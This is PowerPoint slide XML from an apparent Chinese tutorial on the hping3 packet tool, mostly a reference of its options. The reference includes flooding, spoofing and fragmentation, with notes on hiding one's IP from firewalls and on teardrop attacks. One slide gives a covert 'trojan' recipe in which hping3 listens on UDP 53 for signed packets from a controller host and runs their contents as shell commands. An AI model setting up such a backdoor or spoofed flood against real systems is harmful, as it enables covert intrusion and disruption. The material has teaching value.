              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>主机。发送包大小为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>100</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>字节（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-d 100</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>），发送签名为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>signature(-sign signature)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1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D2EB-3AE9-49AC-88E7-D7FAE44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木马功能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D678D-9A35-4E89-8843-F7FAA299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Hping3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>能够在远程主机上启动，那么可以作为木马程序启动监听端口，并在建立连接后打开</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通信。与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的后门功能类似。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>示例：本地打开</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>53</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>号</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>端口（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>解析服务）监听来自</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>192.168.10.66</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>主机的包含签名为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>signature</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的数据包，并将收到的数据调用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执行。 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在木马启动端：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>hping3 192.168.10.66--listen signature --safe --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>udp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> -p 53 |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zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在远程控制端：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>echo ls &gt;test.cmd </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>hping3 192.168.10.44 -p53 -d 100 --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>udp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> --sign </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>siganature</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> --file ./test.cmd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>将包含</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>命令的文件加上签名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>signature</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>发送到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>192.168.10.44</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>主机的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>53</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>号</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>端口，包数据长度为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>100</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>字节。 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>当然这里只是简单的演示程序，真实的场景，控制端可以利益</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>执行很多的高级复杂的操作。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>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7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93181-9602-46FD-9878-0486E793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71965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END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011B4-5755-4F07-B27D-39F1D899E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C49B-D64F-40C9-A7B2-1B1CF646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Hping3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>安装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8432E9-BB66-4DBD-AA03-E18C7094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20" y="2023381"/>
            <a:ext cx="9279051" cy="2811238"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="415072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6AEC6-66C0-42AD-A73D-7D8A4117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Hping3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61C24-7D9E-4672-991C-6AD51E6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-h  --help      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>显示帮助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-v  --version   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>显示版本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-c  --count     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>发送数据包的数目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 --interval  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>发送数据包间隔的时间 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>uX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>即</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>X</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>微秒</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>例如：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u1000)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>      --fast      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>等同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u10000 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>每秒</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>个包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--faster    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>等同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u1000 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>每秒</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>100</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>个包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--flood	  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>尽最快发送数据包，不显示回复。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-n  --numeric   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>数字化输出，象征性输出主机地址。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-q  --quiet     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>安静模式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-I  --interface </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>网卡接口 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>默认路由接口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-V  --verbose   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>详细模式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-D  --debug     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>调试信息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-z  --bind      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>绑定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ctrl+z</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ttl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>默认为目的端口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-Z  --unbind    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>取消绑定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ctrl+z</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>键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--beep      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>对于接收到的每个匹配数据包蜂鸣声提示</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41903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9DC2-6CC2-4075-8799-2AD675F1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64BBE3-489D-4E7A-B9EA-05C2D2C0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20" y="1690688"/>
            <a:ext cx="379105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653321-1A80-416C-8002-14562C1DC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59" y="1867758"/>
            <a:ext cx="5810321" cy="41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451B-7810-4A8C-8729-05CEE5A2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B7BDB-F142-4536-8913-E5ECA4EB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default mode     TCP   // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>默认模式是 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>  -0  --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>rawip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>      RAWIP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>模式，原始</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>模式。在此模式下</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>HPING</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>会发送带数据的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>头。即裸</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>方式。使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>RAWSOCKET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>方式。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-1  --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>icmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>       ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>模式，此模式下</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>HPING</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>会发送</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IGMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>应答报，你可以用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>--ICMPTYPE --ICMPCODE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>选项发送其他类型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>模式的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>报文。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-2  --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>udp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>        UDP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>模式，缺省下，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>HPING</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>会发送</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>报文到主机的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>端口，你可以用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>baseport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>destport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> --keep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>选项指定其模式。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-8  --scan       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>SCAN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> mode. //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>扫描模式 指定扫描对应的端口。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>                   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Example: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>hping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> --scan 1-30,70-90 -S www.target.host    // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>扫描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-9  --listen     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>listen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> mode  // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>监听模式</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="947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DE1F-4AE8-44C5-80FF-4EA3D55B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78264-4A44-4547-9DA0-DFCCA602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-a  --spoof      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>spoof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> source address  //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>源地址欺骗。伪造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击，防火墙就不会记录你的真实</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>了，当然回应的包你也接收不到了。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--rand-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>dest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>      random </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>destionation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> address mode. see the man. // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>随机目的地址模式。详细使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>man 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--rand-source    random source address mode. see the man.       // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>随机源地址模式。详细使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>man 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-t  --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ttl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ttl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>默认 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>64)  //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>修改 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ttl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> 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-N  --id         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>默认 随机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)  // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>hping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ID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>值，缺省为随机值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-W  --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>winid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>win* id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>字节顺序  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>winid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>模式，针对不同的操作系统。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>UNIX ,WINDIWS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回应不同的，这选项可以让你的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>回应和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>WINDOWS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>一样。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-r  --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>rel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>相对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r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>估计主机流量</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)  //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>更改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的，可以让</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>曾递减输出，详见</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>HPING-HOWTO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-f  --frag       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>拆分数据包更多的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>frag.  (may pass weak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>acl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)   //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>分段，可以测试对方或者交换机碎片处理能力，缺省</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>字节。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-x  --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>morefrag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>设置更多的分段标志    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>大量碎片，泪滴攻击。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-y  --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
